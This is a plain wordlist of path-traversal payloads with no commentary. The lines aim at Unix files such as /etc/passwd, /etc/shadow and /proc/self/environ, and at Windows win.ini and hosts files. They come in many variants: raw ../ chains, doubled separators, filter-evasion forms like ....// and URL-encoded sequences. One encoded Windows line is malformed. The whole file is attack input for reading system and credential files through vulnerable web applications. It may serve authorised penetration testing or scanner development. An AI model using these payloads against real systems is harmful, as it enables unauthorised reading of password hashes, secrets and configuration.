/etc/passwd
/etc/shadow
/proc/self/environ
\windows\win.ini
\C:\Windows\win.ini
\C:\Windows\System32\drivers\etc\hosts

/../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow
/../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ
\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
\..\..\..\..\..\..\..\..\..\..\C:\Windows\win.ini
..\..\..\..\..\..\..\..\..\..\C:\Windows\win.ini
\..\..\..\..\..\..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts

/....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
/....//....//....//....//....//....//....//etc/shadow
....//....//....//....//....//....//....//etc/shadow
/....//....//....//....//....//....//....//proc/self/environ
....//....//....//....//....//....//....//proc/self/environ
\....\\....\\....\\....\\....\\....\\....\\windows\win.ini
....\\....\\....\\....\\....\\....\\....\\windows\win.ini
\....\\....\\....\\....\\....\\....\\....\\C:\Windows\win.ini
....\\....\\....\\....\\....\\....\\....\\C:\Windows\win.ini
\....\\....\\....\\....\\....\\....\\....\\C:\Windows\System32\drivers\etc\hosts
....\\....\\....\\....\\....\\....\\....\\C:\Windows\System32\drivers\etc\hosts

/..//..//..//..//..//..//..//..//..//..//..//etc/passwd
..//..//..//..//..//..//..//..//..//..//..//etc/passwd
/..//..//..//..//..//..//..//..//..//..//..//etc/shadow
..//..//..//..//..//..//..//..//..//..//..//etc/shadow
/..//..//..//..//..//..//..//..//..//..//..//proc/self/environ
..//..//..//..//..//..//..//..//..//..//..//proc/self/environ
\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\win.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\win.ini
\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\C:\Windows\win.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\C:\Windows\win.ini
\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\C:\Windows\System32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\C:\Windows\System32\drivers\etc\hosts

/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ
\..%5..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CCwindows\win.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows\win.ini
\..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CC:\Windows\win.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CC:\Windows\win.ini
\..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CC:\Windows\System32\drivers\etc\hosts
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CC:\Windows\System32\drivers\etc\hosts

/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ
\%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows\win.ini
\%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\win.ini
\%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts